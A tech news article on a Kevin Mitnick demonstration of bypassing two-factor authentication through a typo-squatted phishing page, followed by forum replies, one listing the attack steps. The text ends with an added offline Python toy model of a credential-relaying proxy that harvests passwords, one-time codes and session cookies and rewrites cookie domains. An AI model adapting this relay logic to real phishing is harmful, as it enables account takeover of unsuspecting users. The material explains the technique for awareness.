Hacker Kevin Mitnick shows how to bypass 2FA


tao

A new exploit allows hackers to spoof two-factor authentication requests by sending a user to a fake login page and then stealing the username, password, and session cookie.

KnowBe4 Chief Hacking Officer Kevin Mitnick showed the hack in a public video. By convincing a victim to visit a typo-squatting domain like “LunkedIn.com” and capturing the login, password, and authentication code, the hacker can pass the credentials to the actual site and capture the session cookie. Once this is done the hacker can log in indefinitely. This essentially uses the one-time 2FA code as a way to spoof a login and grab data.

“A white hat hacker friend of Kevin’s developed a tool to bypass two-factor authentication using social engineering tactics – and it can be weaponized for any site,” said Stu Sjouwerman, KnowBe4 CEO. “Two-factor authentication is intended to be an extra layer of security, but in this instance, we clearly see that you can’t rely on it alone to protect your organization.”

White hat hacker Kuba Gretzky created the system, called evilginx, and describes its implementation in a wonderfully thorough post on his site.

Sjouwerman notes that anti-phishing education is deeply important and that a hack like this is impossible to complete if the victim is savvy about security and the dangers of clicking links that come into your email box. To demonstrate this, Sjouwerman sent me an email seemingly addressed to me from Matt Burns ([email protected]) talking about a typo in a post. When I clicked on it I was transferred to a SendGrid redirect site and dumped into TechCrunch – but the payload could have been more nefarious.


[Two screenshots from the article omitted]

“This highlights the need for new-school security awareness training and simulated phishing because people are truly your last line of defense,” said Sjouwerman. He estimates that hackers will begin trying this technique in the next few weeks and urges users and IT managers to harden their security protocols.


straycat19
Quote

This essentially uses the one time 2FA code as a way to spoof a login and grab data.

 

What sites use a one-time 2FA code? Never heard of such an animal. Every place I use 2FA there is a different code required for every login; even if I would log out and turn around and log back in, I will receive a new 2FA code. KnowBe4 isn't the best security service around by far, and Kevin Mitnick isn't what anyone would call a real hacker. He is just an old script kiddie. Read about his original 'hacking exploits' and arrest; that verifies the script kiddie label.



25 minutes ago, straycat19 said:

Every place I use 2FA there is a different code required for every login, even if I would log out and turn around and log back in, I will receive a new 2FA code

That's also my experience. But the ones with this login are very few according to my experience, so far.



This “bypass” is kinda strange. This is the actual video:
After watching the video one can argue that:

  • This is NOT a 2FA bypass (for me, a 2FA bypass would be if the hacker had only the username and password from the user and found a way to log in with only that, maybe exploiting a race condition, code injection, etc.)
  • This is a MITM plus session hijacking via cookie stealing attack

Basically, what Mitnick did was:

  1. Create a fake LinkedIn page and host it somewhere (I believe he used SET, a famous tool for this kind of action);
  2. Craft a phishing email with a link to the fake LinkedIn page and send to the target;
  3. Wait for the user to click and enter his username, password and 2FA PIN. You can see in the video that the fake "Two-Step Verification" page is very similar to LinkedIn's official one;
  4. Get target's username, password and session cookie;
  5. Use the session cookie to login anywhere;
  6. Profit.

IMO, there is nothing new here, just your regular session hijack. Maybe I'm missing something and I'd be happy if someone could point out my mistake.

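Neither the article nor the replies show how the relay actually works, so here is an added toy model in Python of the procedure the first post describes and the reply above lists as steps 3 to 5: the cloned page collects username, password and one-time code, the proxy forwards them to the real site, keeps the session cookie that comes back, and the attacker later replays that cookie. This is example code written for this page, not code from the article, from KnowBe4 or from evilginx. Apart from LunkedIn.com, which the article names, the hostnames, form field names, cookie names and the fake upstream login endpoint are constructed stand-ins, and nothing here touches the network.

```python
"""Toy model of a credential-relaying phishing proxy, the class of tool
evilginx belongs to.  Added illustration only: not code from the article,
KnowBe4 or evilginx.  Hostnames (other than the article's LunkedIn.com),
form fields, cookie names and the upstream stub are all constructed."""
from http.cookies import SimpleCookie
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode

PHISH_HOST = "lunkedin.com"      # typo-squat the victim actually visits (named in the article)
REAL_HOST = "www.linkedin.com"   # real site the proxy logs in to on the victim's behalf

# Constructed stand-in for the real site's server-side session table.
SESSIONS: Dict[str, str] = {}


def fake_upstream(creds: Dict[str, str]) -> Dict:
    """Stub for the real login endpoint.  Assumption: any six-digit code is
    accepted.  A real site checks the one-time code, but that does not hurt
    the proxy: it forwards the code within seconds, while it is still valid,
    and the session cookie it gets back does not expire with the code."""
    code = creds.get("otp", "")
    if not (creds.get("username") and creds.get("password")
            and code.isdigit() and len(code) == 6):
        return {"status": 401, "headers": []}
    sid = "constructed-session-%d" % (len(SESSIONS) + 1)
    SESSIONS[sid] = creds["username"]
    return {
        "status": 302,
        "headers": [
            ("Location", "https://%s/feed/" % REAL_HOST),
            ("Set-Cookie", "sid=%s; Domain=.linkedin.com; Path=/; Secure; HttpOnly" % sid),
            ("Set-Cookie", "lang=en-us; Domain=.linkedin.com; Path=/"),
        ],
    }


def relay_login(victim_body: str, upstream=fake_upstream) -> Tuple[Dict, Dict]:
    """One round trip of the proxy (steps 3-5 of the reply): read what the
    victim typed into the cloned page, replay it to the real site, keep a
    copy of every Set-Cookie, and rewrite the response so the victim's
    browser stores the cookies for the phishing host and follows the redirect
    back through the proxy.  The victim ends up logged in and sees nothing odd."""
    creds = {k: v[0] for k, v in parse_qs(victim_body, keep_blank_values=True).items()}
    resp = upstream(creds)

    stolen: Dict[str, str] = {}
    rewritten: List[Tuple[str, str]] = []
    for name, value in resp["headers"]:
        if name.lower() == "set-cookie":
            jar = SimpleCookie()
            jar.load(value)
            for morsel in jar.values():
                stolen[morsel.key] = morsel.value          # usable as-is against REAL_HOST
                morsel["domain"] = "." + PHISH_HOST        # so the victim's browser keeps it too
                rewritten.append(("Set-Cookie", morsel.OutputString()))
        elif name.lower() == "location":
            rewritten.append((name, value.replace(REAL_HOST, PHISH_HOST)))
        else:
            rewritten.append((name, value))

    loot = {
        "username": creds.get("username"),
        "password": creds.get("password"),
        "otp": creds.get("otp"),        # already spent; worthless from here on
        "cookies": stolen,              # the durable prize
    }
    return loot, {"status": resp["status"], "headers": rewritten}


def replay_session(stolen: Dict[str, str]) -> Optional[str]:
    """Afterwards the attacker simply presents the stolen cookie.  The real
    site asks for neither password nor a fresh code: both were already
    supplied when the session was created."""
    jar = SimpleCookie()
    jar.load("; ".join("%s=%s" % kv for kv in stolen.items()))
    return SESSIONS.get(jar["sid"].value) if "sid" in jar else None


if __name__ == "__main__":
    body = urlencode({"username": "victim@example.com", "password": "hunter2", "otp": "123456"})
    loot, victim_response = relay_login(body)
    print("harvested:", loot)
    print("victim's browser receives:", victim_response)
    print("attacker replays cookie, logged in as:", replay_session(loot["cookies"]))
```

Running it prints the harvested credentials, the response the victim's browser receives (Domain rewritten to the phishing host, redirect pointing back through the proxy) and the attacker's successful replay with only the cookie. The one-time code is consumed by the single forwarded request; the stub accepts any fresh six-digit value because the point is timing rather than code reuse: a code that changes on every login is still relayed inside its validity window, and only the session cookie has to survive.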

